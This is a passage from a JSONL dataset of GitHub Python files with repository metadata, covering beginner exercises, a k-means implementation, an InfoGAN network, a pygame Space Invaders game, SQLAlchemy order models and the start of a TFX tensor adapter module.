key-value pairs\r\n inverse[v] = inverse.get(v, []) + [k] #dictionary_name.get() is an in-built function that takes a key and a defualt value and returns the corresponding value\r\n return inverse\r\n\r\n\r\n#Main function\r\ns=input(\"Enter the string:\")\r\nd=dictionary(s)\r\nprint(\"The letters and the number of times it is repeated are:\")\r\nprint(d)\r\n\r\nprint(\"The inverse of this dictionary is:\")\r\nnewd=inverse_Dictionary(d)\r\nprint(newd)\r\n","repo_name":"BVarunRaju/Learning_Python","sub_path":"Level_Beginner/Dictionary/Dictionary_and_List.py","file_name":"Dictionary_and_List.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27613028922","text":"from csv_helper import CSVHelper\nfrom functools import reduce\nfrom textblob import TextBlob as tb #text Bynary Large Object\n\n\ndef tf(word, blob): # fuction to count te term frecuency.\n return blob.words.count(word) / len(blob.words)\n\ndef n_containing(word, bloblist): # count the word ocurance in the document list.\n return sum(1 for blob in bloblist if word in blob)\n\ndata = CSVHelper.load_csv(\"dbscan_results.csv\")\n\ntweets = CSVHelper.load_csv(\"clean_tweets.csv\")\ntweetOrdered = list(map(lambda x: x.split(','), tweets))\n\n#Get real clean tweets\nlistDoc = []\nfor cluster in data:\n sub =[]\n cluster = [int(item) for item in cluster if (item != ',' and item != ' ')]\n for t in cluster:\n sub.append(tb(tweetOrdered[int(t)][1].strip()))\n listDoc.append(sub)\n\n\n\nresultWords = []\nfor x,cluster in enumerate(listDoc):\n scores = {}\n blobList = reduce(lambda x,y: x+y,cluster)\n print(len(cluster))\n for i, blob in enumerate(cluster):\n print(i)\n scores = {word: tf(word, blobList) for word in blob.words}\n sorted_words = sorted(scores.items(), key=lambda x: x[1], reverse=True)\n resultWords.append({'cluster'+str(x): sorted_words[0][0]})\n print(sorted_words)\n\nprint(resultWords)\n\n\n \n","repo_name":"juancho618/data_analysis","sub_path":"bestWord.py","file_name":"bestWord.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35588854716","text":"import heapq\n\ndef solution(scoville, K):\n \n cnt = 0\n heapq.heapify(scoville)\n\n while len(scoville)>=2:\n a = heapq.heappop(scoville)\n b = heapq.heappop(scoville)\n c = a+2*b\n heapq.heappush(scoville, c)\n cnt += 1 # 1회 섞었음\n \n if scoville[0] >= K: # 제일 안매운게 K 이상이면\n break # 종료\n\n if scoville[0] >= K: # 하나남아도, K보다 매우면\n return cnt\n else: # 하나남았는데 K보다 덜 매우면\n return -1\n\n# [1, 2, 3, 9, 10, 12]\t7\t2\nprint(solution([1, 2, 3, 9, 10, 12],7))\n","repo_name":"agilestar8/coding-test-","sub_path":"프로그래머스 lv2/더 맵게.py","file_name":"더 맵게.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19584758789","text":"# You are given an integer N followed by N email addresses. Your task is to print a list containing only valid email\n# addresses in lexicographical order.\n\n# Valid email addresses must follow these rules:\n# It must have the username@websitename.extension format type.\n# The username can only contain letters, digits, dashes and underscores.\n# [a-z], [A-Z],[0-9],[-].\n# The website name can only have letters and digits [a-z], [A-Z],[0-9].\n# The extension can only contain letters [a-z], [A-Z].\n# The maximum length of the extension is 3.\n\n# Sample input\n# 3\n# lara@hackerrank.com\n# brian-23@hackerrank.com\n# britts_54@hackerrank.com\n\n# Sample output\n# ['brian-23@hackerrank.com', 'britts_54@hackerrank.com', 'lara@hackerrank.com']\n\n\nimport re\n\n\ndef fun(s):\n regex = r\"^([a-zA-Z0-9-_]+)@([a-zA-Z0-9]+)\\.([a-zA-Z]{,3})$\"\n if re.fullmatch(regex, s):\n return bool\n\n\ndef filter_mail(emails):\n return list(filter(fun, emails))\n\n\nn = int(input(\"Enter a number: \"))\nemails = []\nfor _ in range(n):\n emails.append(input(\"Enter a email: \"))\n\nfiltered_emails = filter_mail(emails)\nfiltered_emails.sort()\nprint(filtered_emails)\n\n\n","repo_name":"chiragpys/python","sub_path":"HackerRank/36_Validating_Email_Addresses_With_Filter.py","file_name":"36_Validating_Email_Addresses_With_Filter.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22698640922","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Generator(nn.Module):\n def __init__(self, db='mnist', z_dim=128, cc_dim=1, dc_dim=10):\n super(Generator, self).__init__()\n self.db = db\n\n if self.db == 'mnist':\n self.fc = nn.Sequential(\n nn.Linear(z_dim + cc_dim + dc_dim, 1024),\n nn.BatchNorm2d(1024),\n nn.ReLU(),\n\n nn.Linear(1024, 128*7*7),\n nn.BatchNorm2d(128*7*7),\n nn.ReLU()\n )\n self.conv = nn.Sequential(\n # [-1, 128, 7, 7] -> [-1, 64, 14, 14]\n nn.ConvTranspose2d(128,64,4,2,1),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n\n # -> [-1, 1, 28, 28]\n nn.ConvTranspose2d(64,1,4,2,1),\n nn.Tanh()\n )\n else:\n self.main = nn.Sequential(\n # [-1, z + cc + dc, 1, 1] -> [-1, 512, 4, 4]\n nn.ConvTranspose2d(z_dim + cc_dim + dc_dim, 1024, 4, 1, 0),\n\n nn.ConvTranspose2d(1024, 512, 4, 2, 1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n\n # [-1, 256, 8, 8]\n nn.ConvTranspose2d(512, 256, 4, 2, 1),\n nn.BatchNorm2d(256),\n nn.ReLU(),\n\n # [-1, 128, 16, 16]\n nn.ConvTranspose2d(256, 128, 4, 2, 1),\n nn.BatchNorm2d(128),\n nn.ReLU(),\n\n # [-1, 3, 32, 32]\n nn.ConvTranspose2d(128, 3, 4, 2, 1),\n nn.Tanh()\n )\n\n def forward(self, z):\n if self.db == 'mnist':\n # [-1, z]\n z = self.fc( z )\n\n # [-1, 128*7*7] -> [-1, 128, 7, 7]\n z = z.view(-1, 128, 7, 7)\n out = self.conv(z)\n else:\n # [-1, z] -> [-1, z, 1, 1]\n z = z.view(z.size(0), z.size(1), 1, 1)\n out = self.main( z )\n\n return out\n\n\nclass Discriminator(nn.Module):\n def __init__(self, db='mnist', cc_dim = 1, dc_dim = 10):\n super(Discriminator, self).__init__()\n self.db = db\n self.cc_dim = cc_dim\n self.dc_dim = dc_dim\n\n if self.db=='mnist':\n self.conv = nn.Sequential(\n # [-1, 1, 28, 28] -> [-1, 64, 14, 14]\n nn.Conv2d(1, 64, 4, 2, 1),\n nn.LeakyReLU(0.1, inplace=True),\n\n # [-1, 128, 7, 7]\n nn.Conv2d(64, 128, 4, 2, 1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.1, inplace=True),\n )\n self.fc = nn.Sequential(\n nn.Linear(128*7*7, 128),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Linear(128, 1 + cc_dim + dc_dim)\n )\n else:\n self.main = nn.Sequential(\n # [-1, 3, 32, 32] -> [-1, 128, 16, 16]\n nn.Conv2d(3, 128, 4, 2, 1),\n nn.LeakyReLU(0.1, inplace=True),\n\n # [-1, 256, 8, 8]\n nn.Conv2d(128, 256, 4, 2, 1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.1, inplace=True),\n\n # [-1, 512, 4, 4]\n nn.Conv2d(256, 512, 4, 2, 1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(512, 1024, 4, 2, 1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(0.1, inplace=True),\n\n # [-1, 1 + cc_dim + dc_dim, 1, 1]\n nn.Conv2d(1024, 1 + cc_dim + dc_dim, 4, 1, 0)\n )\n\n def forward(self, x):\n if self.db == 'mnist':\n # -> [-1, 128*7*7]\n tmp = self.conv(x).view(-1, 128*7*7)\n\n # -> [-1, 1 + cc_dim + dc_dim]\n out = self.fc(tmp)\n else:\n # -> [-1, 1 + cc_dim + dc_dim]\n out = self.main(x).squeeze()\n\n # Discrimination Output\n out[:, 0] = F.sigmoid(out[:, 0].clone())\n\n # Continuous Code Output = Value Itself\n # Discrete Code Output (Class -> Softmax)\n out[:, self.cc_dim + 1:self.cc_dim + 1 + self.dc_dim] = F.softmax(out[:, self.cc_dim + 1:self.cc_dim + 1 + self.dc_dim].clone())\n\n return out\n","repo_name":"Hadar-Sha/Deep-Learning","sub_path":"pytorch/tutorials/infoGan_network.py","file_name":"infoGan_network.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8761985058","text":"import random\nimport numpy as np\nimport src\n\n\n\nclass KMEANS:\n def __init__(self, k=5, max_iterations=300):\n self.k = k\n self.max_iterations = max_iterations\n\n def fit(self, data):\n self.centroids = {}\n\n # инициализируем центроиды\n for i in range(self.k):\n self.centroids[i] = data[random.randint(0, len(data)-1)]\n\n # делаем max_iterations итераций поиска\n for i in range(self.max_iterations):\n self.clusters = {}\n for j in range(self.k):\n self.clusters[j] = []\n\n # найдем расстояния от точек до центроидов\n for dot in data:\n distances = [np.linalg.norm(dot - self.centroids[centroid]) for centroid in self.centroids]\n bestCluster = distances.index(min(distances))\n self.clusters[bestCluster].append(dot)\n\n # пересчитаем центроиды(центр масс)\n for cluster in self.clusters:\n self.centroids[cluster] = np.average(self.clusters[cluster], axis=0)\n\n # добавить условие останова : максимальное расстояние от новых центров до старых меньше эпсилон\n\n def predict(self, data):\n distances = [np.linalg.norm(data - self.centroids[centroid]) for centroid in self.centroids]\n classsification = distances.index(min(distances))\n return classsification\n\n\ndef main():\n data = src.X2\n xlabel, ylabel, title = 'Income', 'Score', 'KMeans'\n kmeans = KMEANS(4)\n kmeans.fit(data)\n labels = [kmeans.predict(data[i]) for i in range(len(data))]\n centroids = [kmeans.centroids[i] for i in range(len(kmeans.centroids))]\n src.plotClusters(data, labels, centroids, '2d', xlabel, ylabel, title)\n src.metrics(data, centroids, labels)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mefistofel666/Clustering-Algorithms","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12081926506","text":"# games 2020\n\nimport random\n\nmoney = 100 # money that the player starts with\n\nprint(\"Games: coinflip, cho han, cards\") # initial greetings\nprint(\"You start with $100\")\n\ndef vibe_check(): # function that checks how much money the player has, exits if money <= 0\n\n global money # money must be a global variable to play with it in a function\n\n if money <= 0:\n print(\"You don't have enough money to play! Goodbye.\")\n exit() # exits the game if the player doesn't have enough cash\n else:\n print(\"You have $\" + str(money) + \" to play with.\") # if the player has enough $, prints the amount\n\ndef coin_flip(guess, bet): # coin flipping game that checks guess and bet\n\n global money\n\n num = random.randint(1,2) # 1 = heads, 2 = tails\n\n if guess == \"heads\":\n guess = 1\n elif guess == \"tails\":\n guess = 2\n else:\n main()\n\n if num == guess and num == 1:\n print(\"You flipped heads, you win! $\" + str(bet) + \" will be added to your money.\")\n money += bet\n main()\n elif num == guess and num == 2:\n print(\"You flipped tails, you win! $\" + str(bet) + \" will be added to your money.\")\n money += bet\n main()\n else:\n print(\"You guessed incorrectly! $\" + str(bet) + \" will be subtracted from your money.\")\n money += (-bet)\n main()\n\ndef cho_han(guess, bet):\n\n global money\n\n num1 = random.randint(1,6)\n num2 = random.randint(1,6)\n\n if guess == \"odd\" and num1 + num2 % 2 != 0:\n print(\"You guessed odd, you win! $\" + str(bet) + \" will be added to your money.\")\n money += (bet)\n main()\n elif guess == \"odd\" and num1 + num2 % 2 == 0:\n print(\"You guessed incorrectly! $\" + str(bet) + \" will be subtracted from your money.\")\n money += (-bet)\n main()\n elif guess == \"even\" and num1 + num2 % 2 == 0:\n print(\"You guessed even, you win! $\" + str(bet) + \" will be added to your money.\")\n money += bet\n main()\n elif guess == \"even\" and num1 + num2 % 2 != 0:\n print(\"You guessed incorrectly! $\" + str(bet) + \" will be subtracted from your money.\")\n money += (-bet)\n main()\n else:\n main()\n\ndef cards(bet):\n\n global money\n\n num1 = random.randint(1,52)\n num2 = random.randint(1,52)\n opp_bet = random.randint(1,100)\n\n print(\"Opponent bets $\" + str(opp_bet))\n\n if num1 > num2:\n money += bet\n money += opp_bet\n print(\"You picked a card higher than your opponent! $\" + str(bet) + \" and $\" + str(opp_bet) + \" will be added to your money.\")\n main()\n elif num1 < num2:\n money += (-bet)\n money += (-opp_bet)\n print(\"Your opponent picked a higher card, you lose $\" + str(bet) + \" and $\" + str(opp_bet))\n main()\n else: # if num1 isn't bigger than num2 and visa versa, they must be equal\n print(\"You and your opponent picked the same card! Tie game!\")\n main()\n\ndef main():\n\n input1 = input(\"Enter a game to play: \")\n\n if input1 == \"exit\":\n print(\"Good game! You ended with $\" + str(money) + \".\")\n exit()\n elif input1 == \"money\":\n print(\"You have $\" + str(money))\n main()\n elif input1 == \"coinflip\":\n input2 = input(\"Heads or tails: \")\n input3 = int(input(\"Enter bet: \"))\n vibe_check()\n coin_flip(input2, input3)\n elif input1 == \"cho han\":\n input2 = input(\"Odd or even: \")\n input3 = int(input(\"Enter bet: \"))\n vibe_check()\n cho_han(input2, input3)\n elif input1 == \"cards\":\n input2 = int(input(\"Enter bet: \"))\n vibe_check()\n cards(input2)\n else:\n main()\nmain()\n\ndef exit():\n print(\"\")\n","repo_name":"tornattj/games","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34740423272","text":"import sys\nfrom datetime import date, datetime, time\n\n\ndef usage():\n print(f\"Usage: {sys.argv[0]} -d \\\"yyyy-mm-dd\\\"\")\n\n\nif len(sys.argv) != 4 or sys.argv[2] != '-d':\n usage()\n exit(1)\n\n\nallCookies = {}\n\ncookie_log = open(sys.argv[1], \"r\")\n\ndate_time = datetime.strptime(sys.argv[3], \"%Y-%m-%d\")\n\nfor cur in cookie_log.readlines():\n cookie, timestamp = cur.split(\",\")\n timestamp = timestamp.replace(\"\\n\", \"\")\n tmp_datetime = datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S%z')\n if date_time.strftime('%Y-%m-%d') == tmp_datetime.strftime('%Y-%m-%d'):\n if cookie in allCookies:\n allCookies[cookie] += 1\n else:\n allCookies[cookie] = 1\n\n\nx = max(allCookies.values(), key= lambda x: x)\n\nfor cookie, y in allCookies.items():\n if y == x:\n print(cookie)\n\ncookie_log.close()","repo_name":"keshut/MostActiveCookie","sub_path":"Cookies.py","file_name":"Cookies.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22137563455","text":"import pygame\r\nimport os\r\nimport random\r\nfrom pygame import mixer\r\nimport tkinter.messagebox as tmsg\r\n\r\n# It will initialize Pygame\r\n# To access all of it's methods and features\r\npygame.init()\r\n\r\n# Display Screen\r\n# Width = 800\r\n# Height = 600\r\ngame_screen = pygame.display.set_mode((800, 600))\r\n\r\n# Title of the Game Window\r\npygame.display.set_caption(\"Space Invaders\")\r\n\r\nSupporting_Files_Missing = False\r\n\r\n# Icon of the Game window\r\ntry:\r\n GameWindow_Icon = pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\Game_Screen_Icon.png\")) # Icon Object\r\nexcept:\r\n Supporting_Files_Missing = True\r\npygame.display.set_icon(GameWindow_Icon) # Set Icon\r\n\r\n# Space Background\r\ntry:\r\n SpaceBackground_Image = pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\Space.jpg\")) # Image Size 800 X 600\r\nexcept:\r\n Supporting_Files_Missing = True\r\n\r\n# Spaceship Image\r\ntry:\r\n SpaceShip_Image = pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\SpaceShip.png\")) # Image Size 64 x 64\r\nexcept:\r\n Supporting_Files_Missing = True\r\n# X and Y co-ordinate supposed to be the top left corner of the Image\r\n# Trying to place the Spaceship Image at Exactly Middle at Bottom\r\n# X supposed to be Middle\r\n# Y supposed to be little up from bottom\r\nSpaceShip_Pos_X = 368 # 800/2 => 400 - (64/2) => 368\r\nSpaceShip_Pos_Y = 520 # 600 - 64 + 16 (little up from exact bottom) => 536\r\n\r\n# Alien Image\r\nNumber_of_Aliens = 5\r\nAliens_Image = []\r\nAliens_Pos_X = []\r\nAliens_Pos_Y = []\r\nMove_To_Right = []\r\nMove_To_Left = []\r\n\r\nfor Alien in range(Number_of_Aliens):\r\n try:\r\n Aliens_Image.append(pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\Alien.png\"))) # Image Size 64 x 64\r\n except:\r\n Supporting_Files_Missing = True\r\n # Enemy will appear in different positions\r\n Aliens_Pos_X.append(random.randint(0,736))\r\n Aliens_Pos_Y.append(random.randint (10, 100))\r\n Move_To_Right.append(True)\r\n Move_To_Left.append(False)\r\n\r\n# Bullet Image\r\ntry:\r\n Bullet_Image = pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\Bullet.png\")) # Image Size 32 x 32\r\nexcept:\r\n Supporting_Files_Missing = True\r\nBullet_Pos_X = 0\r\nBullet_Pos_Y = 0\r\n\r\n# Explosion Image\r\ntry:\r\n Explosion_Image = pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\Explosion.png\")) # Image Size 32 x 32\r\nexcept:\r\n Supporting_Files_Missing = True\r\n\r\n# Need to draw the space background over game screen\r\ndef drawSpaceBackground():\r\n game_screen.blit(SpaceBackground_Image, (0,0))\r\n\r\n# Need to draw the spaceship over game screen\r\ndef drawSpaceShip(pos_X, pos_Y):\r\n game_screen.blit(SpaceShip_Image, (pos_X, pos_Y))\r\n\r\n# Need to draw the Alien over game screen\r\ndef drawAlien(Alien_Image, pos_X, pos_Y):\r\n game_screen.blit(Alien_Image, (pos_X, pos_Y))\r\n\r\n# Need to draw the Bullet over game screen\r\ndef drawBullet(pos_X, pos_Y):\r\n game_screen.blit(Bullet_Image, (pos_X, pos_Y))\r\n\r\n# Check if collision happend in between current bullet and Enemy\r\ndef detectCollision(bullet_X, bullet_y, alien_x, alien_y):\r\n if (bullet_X >= alien_x+3 and bullet_X <= alien_x+64-3) and (bullet_y <= alien_y+64-3 and bullet_y >= alien_y+3):\r\n game_screen.blit(Explosion_Image, (alien_x, alien_y)) # Draw Explosion Image\r\n return True # Collision Happened\r\n else:\r\n return False\r\n\r\n# Check If Alien enterd into Spaceship Zone\r\ndef AlienEnterdIntoSpaceshipArea(Aliens_Pos, SpaceShip_Pos):\r\n if Aliens_Pos >= SpaceShip_Pos:\r\n return True\r\n else:\r\n return False\r\n\r\n# Variable to Detect if Game is running\r\nGame_ON = True\r\nGame_Over = False\r\nBullet_can_be_Fired = False\r\nBullet_is_on_Screen = False\r\nEnemy_is_Killed = False\r\n\r\n# Player Score\r\nPlayer_Score = 0\r\n# Player score Font\r\ntry:\r\n Player_Score_Font = pygame.font.Font(os.path.join(os.getcwd(), \"Supporting_Images\\\\OpenSans-Regular.ttf\"), 24)\r\nexcept:\r\n Supporting_Files_Missing = True\r\n# Game Over Message Font\r\ntry:\r\n GameOverMessage_Font = pygame.font.Font(os.path.join(os.getcwd(), \"Supporting_Images\\\\OpenSans-Regular.ttf\"), 64)\r\nexcept:\r\n Supporting_Files_Missing = True\r\n\r\n# Bullet Sound\r\ntry:\r\n Bullet_Sound = mixer.Sound(\"Supporting_Images\\\\Bullet_Sound.wav\")\r\nexcept:\r\n Supporting_Files_Missing = True\r\n# Explosion Sound\r\ntry:\r\n Explosion_Sound = mixer.Sound(\"Supporting_Images\\\\Explosion.wav\")\r\nexcept:\r\n Supporting_Files_Missing = True\r\n\r\n# Show Player score\r\ndef showPlayerScore(Score_value):\r\n # Render Message\r\n scoreMassage = Player_Score_Font.render(f\"Score : {Score_value}\", True, (255, 255, 255))\r\n game_screen.blit(scoreMassage, (10, 10))\r\n\r\n# Show Game Over Message\r\ndef GameOverMessage():\r\n # Render Message\r\n GameOverMassage = GameOverMessage_Font.render(f\"Game Over\", True, (255, 255, 255))\r\n game_screen.blit(GameOverMassage, (200, 250))\r\n\r\n# Show Supporting File Issue Message\r\ndef SupportingFileIssueMessage():\r\n pygame.font.init()\r\n SupportingFileIssue_Font = pygame.font.SysFont('Comic Sans MS', 64)\r\n # Render Message\r\n SupportingFileIssueMassage = SupportingFileIssue_Font.render(f\"Supporting File Missing\", True, (255, 0, 0))\r\n game_screen.blit(SupportingFileIssueMassage, (50, 250))\r\n\r\n# Start Game\r\nwhile Game_ON:\r\n # Set color for Window\r\n # We always to to fill color first. If needed\r\n # Rest of the Images which supposed to be drawn should come over the fill screen\r\n game_screen.fill((0, 0, 0)) # RGB value. Now set to Black\r\n\r\n # If Supporting Files are not missing\r\n if Supporting_Files_Missing == False:\r\n # Draw space background on each frame\r\n drawSpaceBackground()\r\n\r\n if Game_Over == False:\r\n # During game is active\r\n # Pygame will full of continuous Events\r\n # At each moment we should capture which all events are going on\r\n # Based on that we should control the Game\r\n for event in pygame.event.get(): # Capture all the events at every moment\r\n if event.type == pygame.QUIT: # Pressed close button of the screen window\r\n Game_ON = False # Game screen is closed\r\n\r\n if event.type == pygame.KEYDOWN: # KEYDOWN means some key from keyboard is presses. It will true until we are not releasing finger from the key\r\n # Check which particular key is pressed\r\n if event.key == pygame.K_LEFT: # Left arrow key is pressed\r\n if SpaceShip_Pos_X >= 10: # Ensure that Spaceship is not moved out from screen\r\n SpaceShip_Pos_X -= 10\r\n if event.key == pygame.K_RIGHT: # Right arrow pressed\r\n if SpaceShip_Pos_X <= 790-64: # Ensure that Spaceship is not moved out from screen\r\n SpaceShip_Pos_X += 10\r\n if event.key == pygame.K_SPACE: # Fire Bullet if No Bullet is on Screen. At a time only 1 bullet can be fired\r\n Bullet_can_be_Fired = True # Now Bullet can be fired\r\n if Bullet_is_on_Screen == False: # Only if no bullet is on Screen, then only fire next one\r\n Bullet_is_on_Screen = True\r\n Bullet_Pos_X = SpaceShip_Pos_X + 16\r\n Bullet_Pos_Y = SpaceShip_Pos_Y - 32 - 5\r\n if event.type == pygame.KEYUP: # KEYUP means Key is released\r\n pass # Nothing to do with this Game\r\n\r\n # Draw Spaceship Continously over the screen\r\n drawSpaceShip(SpaceShip_Pos_X, SpaceShip_Pos_Y)\r\n\r\n for Alien_pos, Alien in enumerate(Aliens_Image):\r\n Bullet_coolided_with_ALien = detectCollision(Bullet_Pos_X, Bullet_Pos_Y, Aliens_Pos_X[Alien_pos],Aliens_Pos_Y[Alien_pos])\r\n\r\n # Display Current Bullet and Current enemy over the screen, until they are not collided\r\n if not Bullet_coolided_with_ALien:\r\n # Enemy Movement\r\n # While it will hit at left wall it will start moving to right\r\n # While it will hit at right wall it will start moving at left\r\n if Aliens_Pos_X[Alien_pos] <= 0:\r\n Move_To_Right[Alien_pos] = True\r\n Move_To_Left[Alien_pos] = False\r\n if Aliens_Pos_X[Alien_pos] >= 800 - 64 - 0.1:\r\n Move_To_Right[Alien_pos] = False\r\n Move_To_Left[Alien_pos] = True\r\n if Move_To_Right[Alien_pos]:\r\n Aliens_Pos_X[Alien_pos] += 0.8\r\n if Move_To_Left[Alien_pos]:\r\n Aliens_Pos_X[Alien_pos] -= 0.8\r\n Aliens_Pos_Y[Alien_pos] += 0.02\r\n\r\n # Draw Alien Continously over the screen\r\n drawAlien(Aliens_Image[Alien_pos], Aliens_Pos_X[Alien_pos], Aliens_Pos_Y[Alien_pos])\r\n\r\n # Bullet Movement\r\n if Bullet_can_be_Fired:\r\n # If bullet is on screen keep on moving\r\n if Bullet_is_on_Screen:\r\n # If Bullet disappear from screen\r\n # Next bullet is ready for Fire\r\n # If we press Spacebar\r\n if Bullet_Pos_Y <= 0:\r\n Bullet_can_be_Fired = False # Ready for next bullet\r\n Bullet_is_on_Screen = False # Current bullet got disappear from screen\r\n drawBullet(Bullet_Pos_X, Bullet_Pos_Y)\r\n Bullet_Pos_Y -= 1\r\n # Bullet Sound\r\n Bullet_Sound.play()\r\n else:\r\n Player_Score += 1\r\n\r\n # Explosion Sound\r\n mixer.music.load(\"Supporting_Images\\\\Explosion.wav\")\r\n mixer.music.play()\r\n\r\n # Reset Bullet Status\r\n Bullet_Pos_X = 0\r\n Bullet_Pos_Y = 0\r\n Bullet_can_be_Fired = False\r\n Bullet_is_on_Screen = False\r\n\r\n # Regenerate Alien for that position\r\n # Create a New Alien\r\n Aliens_Pos_X[Alien_pos] = random.randint(0, 736)\r\n Aliens_Pos_Y[Alien_pos] = random.randint(10, 100)\r\n Move_To_Right[Alien_pos] = True\r\n Move_To_Left[Alien_pos] = False\r\n\r\n # Check If Alien entered into spaceship zone\r\n if AlienEnterdIntoSpaceshipArea(Aliens_Pos_Y[Alien_pos]+64, SpaceShip_Pos_Y):\r\n Game_Over = True\r\n break\r\n else:\r\n GameOverMessage()\r\n for event in pygame.event.get(): # Capture all the events at every moment\r\n if event.type == pygame.QUIT: # Pressed close button of the screen window\r\n Game_ON = False # Game screen is closed\r\n\r\n # Show Player Score\r\n showPlayerScore(Player_Score)\r\n else:\r\n SupportingFileIssueMessage()\r\n for event in pygame.event.get(): # Capture all the events at every moment\r\n if event.type == pygame.QUIT: # Pressed close button of the screen window\r\n Game_ON = False # Game screen is closed\r\n\r\n # Update Game Screen\r\n # We need to updae screen in a continuous manner\r\n # so that game screen always gets updated with setting u have done\r\n pygame.display.update()","repo_name":"rajarshi9739708186/Python-Projects","sub_path":"Game_SpaceInvaders/Code/Game_SpaceInvaders.py","file_name":"Game_SpaceInvaders.py","file_ext":"py","file_size_in_byte":11615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12507282748","text":"from core import db\nfrom sqlalchemy.orm import relationship\n\nroles = {\n \"sales\":10,\n \"engineering\":20,\n \"production\":30,\n \"finance\":40,\n \"test\":50,\n \"customer\":90\n}\n\nstates = {\n \"added\" : 1,\n \"confirm_add\" : 2,\n \"cost_set\" : 3,\n \"confirm_cost\" : 4,\n \"payed\" : 5,\n \"confirm_pay\": 6,\n \"production_done\":8,\n \"test_done\":9,\n \"production_test_done\":10,\n \"confirm_ready\":11\n}\n\nstates_str = {\n 1: \"Waiting for approve by sales\",\n 2: \"Waiting for set cost by engineering\",\n 3: \"Waiting for approve cost by sales\",\n 4: \"Waiting for pay by customer\",\n 5: \"Waiting for approve payment by finance\",\n 6: \"Waiting for finish production \",\n 8: \"Waiting for QC Test done\",\n 9: \"Waiting for finish QC problems\",\n 10: \"Waiting for approve product by sales\",\n 11: \"Ready\"\n}\n\nclass User(db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n username = db.Column(db.String(11),index=True, unique=True)\n password = db.Column(db.String(11))\n role = db.Column(db.Integer)\n\nclass Product(db.Model):\n __tablename__ = 'products'\n id = db.Column(db.Integer,primary_key=True, autoincrement=True)\n name = db.Column(db.String(100))\n picture = db.Column(db.String(100))\n description = db.Column(db.String(200))\n\nclass Order(db.Model):\n __tablename__ = 'orders'\n id = db.Column(db.Integer,primary_key=True, autoincrement=True)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n user = relationship(\"User\", foreign_keys=user_id)\n product_id = db.Column(db.Integer, db.ForeignKey('products.id'))\n product = relationship(\"Product\", foreign_keys=product_id)\n count = db.Column(db.Integer)\n description = db.Column(db.String(200))\n date = db.Column(db.Integer)\n state = db.Column(db.Integer)\n cost = db.Column(db.Integer)\n test_pass = db.Column(db.Integer)\n \n\n","repo_name":"mabdi/acme-workflow","sub_path":"modules/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26484589957","text":"import abc\nimport functools\nimport typing\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, Union\n\nimport numpy as np\nimport pyarrow as pa\nimport tensorflow as tf\nfrom tfx_bsl.arrow import array_util\nfrom tfx_bsl.arrow import path\n\nfrom tensorflow_metadata.proto.v0 import schema_pb2\n\nTensorRepresentations = Dict[str, schema_pb2.TensorRepresentation]\n\n\nclass TensorAdapterConfig(object):\n \"\"\"Config to a TensorAdapter.\n\n Contains all the information needed to create a TensorAdapter.\n \"\"\"\n\n def __init__(self,\n arrow_schema: pa.Schema,\n tensor_representations: TensorRepresentations,\n original_type_specs: Optional[Dict[str, tf.TypeSpec]] = None):\n self.arrow_schema = arrow_schema\n self.tensor_representations = tensor_representations\n self.original_type_specs = original_type_specs\n\n # See b/167128119 for the reason behind custom pickle/unpickle\n # implementations.\n def __getstate__(self):\n return (self.arrow_schema, {\n k: v.SerializeToString()\n for k, v in self.tensor_representations.items()\n }, self.original_type_specs)\n\n def __setstate__(self, t):\n tensor_representations = {}\n for k, v in t[1].items():\n r = schema_pb2.TensorRepresentation()\n r.ParseFromString(v)\n tensor_representations[k] = r\n self.__init__(t[0], tensor_representations, t[2])\n\n\nclass TensorAdapter(object):\n \"\"\"A TensorAdapter converts a RecordBatch to a collection of TF Tensors.\n\n The conversion is determined by both the Arrow schema and the\n TensorRepresentations, which must be provided at the initialization time.\n Each TensorRepresentation contains the information needed to translates one\n or more columns in a RecordBatch of the given Arrow schema into a TF Tensor\n or CompositeTensor. They are contained in a Dict whose keys are\n the names of the tensors, which will be the keys of the Dict produced by\n ToBatchTensors().\n\n TypeSpecs() returns static 